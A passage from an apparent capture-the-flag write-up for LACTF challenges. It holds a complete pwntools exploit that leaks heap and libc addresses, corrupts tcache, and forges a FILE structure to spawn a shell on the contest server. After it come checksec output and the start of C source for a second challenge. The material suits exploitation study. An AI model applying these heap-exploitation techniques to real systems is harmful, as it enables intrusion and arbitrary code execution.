</span></span><span class="line"><span class="cl"><span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s1">&#39;chall.lac.tf&#39;</span><span class="p">,</span> <span class="mi">31147</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s1">&#39;./libc.so.6&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">calc_real_next</span><span class="p">(</span><span class="nb">next</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">ori</span> <span class="o">=</span> <span class="nb">next</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="nb">next</span> <span class="o">=</span> <span class="n">ori</span> <span class="o">^</span> <span class="p">(</span><span class="nb">next</span> <span class="o">&gt;&gt;</span> <span class="mi">12</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="nb">next</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">fill_student_info</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">major</span><span class="p">,</span> <span class="n">attributes</span><span class="p">,</span> <span class="n">yon</span><span class="p">,</span> <span class="n">aux</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;name: &#39;</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;major: &#39;</span><span class="p">,</span> <span class="n">major</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;(e.g. undergrad = 1): &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">attributes</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">yon</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;(y/n)? &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;y&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;data: &#39;</span><span class="p">,</span> <span class="n">aux</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;(y/n)? &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;n&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">add_student</span><span class="p">(</span><span class="n">UID</span><span class="p">,</span> <span class="n">info</span> <span class="o">=</span> <span class="kc">False</span><span class="p">,</span> <span class="n">name</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;&#39;</span><span class="p">,</span> <span class="n">major</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;&#39;</span><span class="p">,</span> <span class="n">attributes</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;&#39;</span><span class="p">,</span> <span class="n">yon</span> <span class="o">=</span> <span class="kc">False</span><span class="p">,</span> <span class="n">aux</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;&#39;</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Option &gt; &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;1&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;UID: &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">UID</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">info</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;later: &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;y&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">fill_student_info</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">major</span><span class="p">,</span> <span class="n">attributes</span><span class="p">,</span> <span class="n">yon</span><span class="p">,</span> <span class="n">aux</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;later: &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;n&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">get_student_info</span><span class="p">(</span><span class="n">UID</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Option &gt; &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;2&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;UID: &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">UID</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">remove_student</span><span class="p">(</span><span class="n">UID</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Option &gt; &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;3&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;UID: &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">UID</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">exit_fsop</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Option &gt; &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;4&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">attack</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">10</span><span class="p">):</span> <span class="c1"># init</span> </span></span><span class="line"><span class="cl"> <span class="n">add_student</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="kc">True</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="kc">True</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">8</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">remove_student</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">7</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">add_student</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="kc">True</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="kc">True</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">get_student_info</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1"># leak heap</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Name: A&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">leak_next</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">heap</span> <span class="o">=</span> <span class="p">(</span><span class="n">calc_real_next</span><span class="p">(</span><span class="n">leak_next</span><span class="p">)</span> <span class="o">-</span> <span class="mh">0x1e</span><span class="p">)</span> <span class="o">*</span> <span class="mh">0x100</span> </span></span><span class="line"><span class="cl"> <span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;heap = </span><span class="si">{</span><span class="nb">hex</span><span class="p">(</span><span class="n">heap</span><span class="p">)</span><span class="si">}</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">add_student</span><span class="p">(</span><span class="mi">7</span><span class="p">)</span> <span class="c1"># leak libc</span> </span></span><span class="line"><span class="cl"> <span class="n">get_student_info</span><span class="p">(</span><span class="mi">7</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Name: &#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">6</span><span class="p">)</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> <span class="o">-</span> <span class="mh">0x1e6c20</span> </span></span><span class="line"><span class="cl"> <span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;libc = </span><span class="si">{</span><span class="nb">hex</span><span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">address</span><span class="p">)</span><span class="si">}</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">fsop</span> <span class="o">=</span> <span class="n">libc</span><span class="o">.</span><span class="n">symbols</span><span class="p">[</span><span class="s1">&#39;_IO_list_all&#39;</span><span class="p">]</span> <span class="o">-</span> <span class="mh">0x10</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">add_student</span><span class="p">(</span><span class="mi">8</span><span class="p">)</span> <span class="c1"># fix</span> </span></span><span class="line"><span class="cl"> <span class="n">add_student</span><span class="p">(</span><span class="mi">9</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">14</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">add_student</span><span class="p">(</span><span class="n">i</span> <span class="o">%</span> <span class="mi">10</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">7</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">add_student</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="kc">True</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="kc">True</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">7</span><span class="p">):</span> <span class="c1"># init</span> </span></span><span class="line"><span class="cl"> <span class="n">add_student</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="kc">True</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="kc">True</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="mh">0x10</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">fsop</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">add_student</span><span class="p">(</span><span class="mi">7</span><span class="p">,</span> <span class="kc">True</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="n">payload</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="kc">True</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">add_student</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="kc">True</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="kc">True</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">add_student</span><span class="p">(</span><span class="mi">9</span><span class="p">,</span> <span class="kc">True</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="kc">True</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">8</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">remove_student</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">7</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">add_student</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="kc">True</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="kc">True</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">add_student</span><span class="p">(</span><span class="mi">7</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">add_student</span><span class="p">(</span><span class="mi">8</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">fake_io_base</span> <span class="o">=</span> <span class="n">heap</span> <span class="o">+</span> <span class="mh">0x40b0</span> <span class="c1"># house of apple2</span> </span></span><span class="line"><span class="cl"> <span class="n">fake_io</span> <span class="o">=</span> <span class="n">flat</span><span class="p">({</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x0</span><span class="p">:</span> <span class="sa">b</span><span class="s2">&#34; sh;&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x28</span><span class="p">:</span> <span class="mi">1</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x68</span><span class="p">:</span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;system&#39;</span><span class="p">],</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x88</span><span class="p">:</span> <span class="n">fake_io_base</span> <span class="o">+</span> <span class="mh">0x1000</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0xA0</span><span class="p">:</span> <span class="n">fake_io_base</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0xD8</span><span class="p">:</span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;_IO_wfile_jumps&#39;</span><span class="p">],</span> </span></span><span class="line"><span class="cl"> <span class="mh">0xE0</span><span class="p">:</span> <span class="n">fake_io_base</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="n">filler</span><span class="o">=</span><span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x00</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">add_student</span><span class="p">(</span><span class="mi">9</span><span class="p">,</span> <span class="kc">True</span><span class="p">,</span> <span class="n">fake_io</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">,</span> <span class="kc">True</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">exit_fsop</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">attack</span><span class="p">()</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="adventure">adventure </h2><h3 id="checksec-1">checksec </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">[*] &#39;/home/RatherHard/CTF-pwn/LACTF/adventure/chall&#39; </span></span><span class="line"><span class="cl"> Arch: amd64-64-little </span></span><span class="line"><span class="cl"> RELRO: Full RELRO </span></span><span class="line"><span class="cl"> Stack: No canary found </span></span><span class="line"><span class="cl"> NX: NX enabled </span></span><span class="line"><span class="cl"> PIE: PIE enabled </span></span><span class="line"><span class="cl"> SHSTK: Enabled </span></span><span class="line"><span class="cl"> IBT: Enabled </span></span><span class="line"><span class="cl"> Stripped: No </span></span></code></pre></td></tr></table> </div> </div><h3 id="code-1">code </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span><span class="lnt">116 </span><span class="lnt">117 </span><span class="lnt">118 </span><span class="lnt">119 </span><span class="lnt">120 </span><span class="lnt">121 </span><span class="lnt">122 </span><span class="lnt">123 </span><span class="lnt">124 </span><span class="lnt">125 </span><span class="lnt">126 </span><span class="lnt">127 </span><span class="lnt">128 </span><span class="lnt">129 </span><span class="lnt">130 </span><span class="lnt">131 </span><span class="lnt">132 </span><span class="lnt">133 </span><span class="lnt">134 </span><span class="lnt">135 </span><span class="lnt">136 </span><span class="lnt">137 </span><span class="lnt">138 </span><span class="lnt">139 </span><span class="lnt">140 </span><span class="lnt">141 </span><span class="lnt">142 </span><span class="lnt">143 </span><span class="lnt">144 </span><span class="lnt">145 </span><span class="lnt">146 </span><span class="lnt">147 </span><span class="lnt">148 </span><span class="lnt">149 </span><span class="lnt">150 </span><span class="lnt">151 </span><span class="lnt">152 </span><span class="lnt">153 </span><span class="lnt">154 </span><span class="lnt">155 </span><span class="lnt">156 </span><span class="lnt">157 </span><span class="lnt">158 </span><span class="lnt">159 </span><span class="lnt">160 </span><span class="lnt">161 </span><span class="lnt">162 </span><span class="lnt">163 </span><span class="lnt">164 </span><span class="lnt">165 </span><span class="lnt">166 </span><span class="lnt">167 </span><span class="lnt">168 </span><span class="lnt">169 </span><span class="lnt">170 </span><span class="lnt">171 </span><span class="lnt">172 </span><span class="lnt">173 </span><span class="lnt">174 </span><span class="lnt">175 </span><span class="lnt">176 </span><span class="lnt">177 </span><span class="lnt">178 </span><span class="lnt">179 </span><span class="lnt">180 </span><span class="lnt">181 </span><span class="lnt">182 </span><span class="lnt">183 </span><span class="lnt">184 </span><span class="lnt">185 </span><span class="lnt">186 </span><span class="lnt">187 </span><span class="lnt">188 </span><span class="lnt">189 </span><span class="lnt">190 </span><span class="lnt">191 </span><span class="lnt">192 </span><span class="lnt">193 </span><span class="lnt">194 </span><span class="lnt">195 </span><span class="lnt">196 </span><span class="lnt">197 </span><span class="lnt">198 </span><span class="lnt">199 </span><span class="lnt">200 </span><span class="lnt">201 </span><span class="lnt">202 </span><span class="lnt">203 </span><span class="lnt">204 </span><span class="lnt">205 </span><span class="lnt">206 </span><span class="lnt">207 </span><span class="lnt">208 </span><span class="lnt">209 </span><span class="lnt">210 </span><span class="lnt">211 </span><span class="lnt">212 </span><span class="lnt">213 </span><span class="lnt">214 </span><span class="lnt">215 </span><span class="lnt">216 </span><span class="lnt">217 </span><span class="lnt">218 </span><span class="lnt">219 </span><span class="lnt">220 </span><span class="lnt">221 </span><span class="lnt">222 </span><span class="lnt">223 </span><span class="lnt">224 </span><span class="lnt">225 </span><span class="lnt">226 </span><span class="lnt">227 </span><span class="lnt">228 </span><span class="lnt">229 </span><span class="lnt">230 </span><span class="lnt">231 </span><span class="lnt">232 </span><span class="lnt">233 </span><span class="lnt">234 </span><span class="lnt">235 </span><span class="lnt">236 </span><span class="lnt">237 </span><span class="lnt">238 </span><span class="lnt">239 </span><span class="lnt">240 </span><span class="lnt">241 </span><span class="lnt">242 </span><span class="lnt">243 </span><span class="lnt">244 </span><span class="lnt">245 </span><span class="lnt">246 </span><span class="lnt">247 </span><span class="lnt">248 </span><span class="lnt">249 </span><span class="lnt">250 </span><span class="lnt">251 </span><span class="lnt">252 </span><span class="lnt">253 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp"> </span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp"> </span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp"> </span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp"> </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="cp">#define BOARD_SIZE 16 </span></span></span><span class="line"><span class="cl"><span class="cp">#define MAX_MOVES 300 </span></span></span><span class="line"><span class="cl"><span class="cp">#define INPUT_SIZE 8 </span></span></span><span class="line"><span class="cl"><span class="cp">#define NUM_ITEMS 8 </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">char</span> <span class="n">history</span><span class="p">[</span><span class="n">MAX_MOVES</span><span class="p">][</span><span class="n">INPUT_SIZE</span><span class="p">];</span> </span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="n">move_count</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="n">player_x</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="n">player_y</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">last_item</span> <span class="o">=</span> <span 